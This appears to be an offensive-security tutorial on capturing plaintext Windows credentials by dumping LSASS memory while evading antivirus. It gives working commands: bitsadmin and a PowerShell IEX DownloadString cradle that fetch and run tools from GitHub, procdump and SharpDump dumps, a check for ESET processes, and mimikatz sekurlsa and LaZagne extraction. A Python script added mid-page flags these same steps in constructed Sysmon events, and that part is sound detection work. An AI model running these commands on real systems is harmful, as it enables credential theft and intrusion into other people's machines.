# AV-Evading Plaintext Credential Capture

## 1. Prerequisites

You must already hold administrative privileges on the target machine, and an administrator logon session must be present on it (check with `query user`):

```
query user
```

![](/files/-MDxkWRMJswaXtqapKqi)

## 2. Procdump

Point it at the lsass.exe process name to take the dump, then copy the resulting lsass.dmp back to your local machine:

```
cd c:\Windows\Temp

bitsadmin /rawreturn /transfer getfile https://raw.githubusercontent.com/klionsec/CommonTools/master/procdump.exe c:\windows\temp\dump.exe

dump.exe -accepteula -ma lsass.exe lsass.dmp
```

![](/files/-MDxkj2_N0mIgE39Xrri)

Then load and read the dump locally with mimikatz.exe [keep the mimikatz version consistent with the system the dump came from]:

```
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
```

![](/files/-MDxksEw2VvFzNCFcEOH)

## 3. PowerShell

### 1. Remote execution

Only applicable to systems after 2008 R2. The `tasklist` line below checks whether the ESET processes egui.exe / ekrn.exe are running before the dump is attempted:

```
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp"

tasklist | findstr /c:"egui.exe" /c:"ekrn.exe"

dir c:\windows\Temp | findstr "lsass"
```

![](/files/-MDxlW3At1_cM0Jk-MZZ)

Likewise, just copy the lsass_504.dmp file (the suffix is the lsass PID) to your local machine and load it with mimikatz.exe:

```
mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit
```

![](/files/-MDxlex-8R3HYta9mXxS)

### 2. Local execution

```
powershell -exec bypass -Command "& {Import-Module 'C:\Tools\Out-Minidump.ps1'; Get-Process lsass | Out-Minidump -DumpFilePath c:\windows\temp}"
```

![](/files/-MDxlo_aBzlL6se0v0Pn)

PS: the lsass.exe dump produced with PowerShell is roughly 10 MB smaller than the one produced with procdump.

```
mimikatz.exe "sekurlsa::minidump lsass_596.dmp" "sekurlsa::logonPasswords full" exit
```

![](/files/-MDxm9lruQpTzL_3yT0W)

## 4. SharpDump

Project: <https://github.com/GhostPack/SharpDump>

Compile the .sln into an .exe with MSBuild:

```
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe E:\SharpDump-master\SharpDump.sln /t:Rebuild /p:Configuration=Release
```

![](/files/-MDxmeL20ua__MIULcs0)

Run it directly:

![](/files/-MDxmlJDvfspeGUPsYeJ)

First rename the .bin output to a .zip extension, extract the file inside as usual, then hand it to mimikatz to read:

```
mimikatz.exe "sekurlsa::minidump debug596" "sekurlsa::logonPasswords full" "exit"
```

![](/files/-MDxmvdz0wYu0505IpLJ)
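All three dump methods above (procdump in section 2, Out-Minidump in section 3, SharpDump in section 4) leave the same two traces on the target: a process handle on lsass.exe that carries memory-read rights, and a dump file written to disk. The Python script below is an added example for this page, not code from the original post or from any of the projects it links. It triages a handful of Sysmon-style records (Event ID 1 ProcessCreate, 10 ProcessAccess, 11 FileCreate) that are constructed by hand for the example rather than captured from a host, and flags exactly those traces. The allowlist of processes that may legitimately open lsass.exe and the command-line patterns are assumptions meant to be tuned per environment.

```python
"""Triage constructed Sysmon-style events for LSASS memory-dump activity.

Added example for this page, not code from the original post or any project.
The records in SAMPLE_EVENTS are hand-written to resemble Sysmon Event ID 1
(ProcessCreate), 10 (ProcessAccess) and 11 (FileCreate) fields; they are not
real telemetry. BENIGN_LSASS_ACCESSORS and COMMANDLINE_PATTERNS are starting
points to tune per environment, not authoritative rules.
"""
import ntpath
import re

# Windows process access right that permits reading another process's memory.
# MiniDumpWriteDump (used by procdump, Out-Minidump and SharpDump) needs it.
PROCESS_VM_READ = 0x0010

# Processes that legitimately open lsass.exe with broad rights (assumed list; tune per host).
BENIGN_LSASS_ACCESSORS = {"csrss.exe", "wininit.exe", "msmpeng.exe"}

# Command-line fragments matching the procedures shown on this page.
COMMANDLINE_PATTERNS = [
    (re.compile(r"bitsadmin\b.*/transfer\b.*https?://", re.I), "bitsadmin used to download a payload"),
    (re.compile(r"DownloadString\(", re.I), "PowerShell in-memory download cradle"),
    (re.compile(r"Out-Minidump", re.I), "Out-Minidump invoked"),
    (re.compile(r"-ma\s+lsass", re.I), "procdump-style full dump of lsass"),
    (re.compile(r"sekurlsa::", re.I), "mimikatz sekurlsa module"),
]

# Dump artefacts named as on this page: lsass.dmp / lsass_<pid>.dmp and SharpDump's debug<pid>.bin.
DUMP_NAME = re.compile(r"lsass.*\.dmp|debug\d+\.bin")

# Constructed sample events (placeholder URLs, not the ones on the page).
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\tasklist.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /rawreturn /transfer getfile https://example.invalid/procdump.exe c:\windows\temp\dump.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/Out-Minidump.ps1'); "
                    "Get-Process lsass | Out-Minidump -DumpFilePath c:\\windows\\temp\""},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'dir c:\windows\Temp | findstr "lsass"'},
    {"EventID": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Windows\Temp\lsass_596.dmp"},
    {"EventID": 11, "Image": r"C:\Windows\Temp\SharpDump.exe",
     "TargetFilename": r"C:\Windows\Temp\debug596.bin"},
]


def lsass_access_alert(ev):
    """Reason string if a ProcessAccess event grants memory-read rights on lsass.exe, else None."""
    if ev.get("EventID") != 10:
        return None
    if ntpath.basename(ev.get("TargetImage", "")).lower() != "lsass.exe":
        return None
    source = ntpath.basename(ev.get("SourceImage", "")).lower()
    if source in BENIGN_LSASS_ACCESSORS:
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)  # Sysmon logs the mask as a hex string
    if granted & PROCESS_VM_READ:
        return f"{source} opened lsass.exe with memory-read rights (GrantedAccess={granted:#x})"
    return None


def commandline_alert(ev):
    """Reason string for the first matching command-line pattern in a ProcessCreate event, else None."""
    if ev.get("EventID") != 1:
        return None
    cmd = ev.get("CommandLine", "")
    for pattern, reason in COMMANDLINE_PATTERNS:
        if pattern.search(cmd):
            return reason
    return None


def dump_file_alert(ev):
    """Reason string if a FileCreate event writes a file named like an LSASS dump artefact, else None."""
    if ev.get("EventID") != 11:
        return None
    name = ntpath.basename(ev.get("TargetFilename", "")).lower()
    if DUMP_NAME.fullmatch(name):
        return f"LSASS dump artefact written to {ev['TargetFilename']}"
    return None


def triage(events):
    """Run every check over the events; return (EventID, reason) for each hit."""
    hits = []
    for ev in events:
        for check in (lsass_access_alert, commandline_alert, dump_file_alert):
            reason = check(ev)
            if reason:
                hits.append((ev["EventID"], reason))
    return hits


if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(f"[EID {event_id}] {reason}")
```

The handle check is the one that matters most: a `tasklist`-style query that only asks for PROCESS_QUERY_LIMITED_INFORMATION (0x1000) stays quiet, while any non-allowlisted process whose handle carries PROCESS_VM_READ (0x0010, also contained in 0x1010, 0x1410 and 0x1FFFFF) is reported, independent of what the dumping binary was renamed to. The command-line and file-name checks are cheap corroboration and are the ones that break first when an operator changes tool names, so treat them as secondary signals.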

## 5. LaZagne (Python)

Project: <https://github.com/AlessandroZ/LaZagne/releases>

Download it and run `laZagne.exe all` directly:

![](/files/-MDxnUlv1bE4Q6Y6OjP-)

![](/files/-MDxnYPPZmpZyftiWlvI)

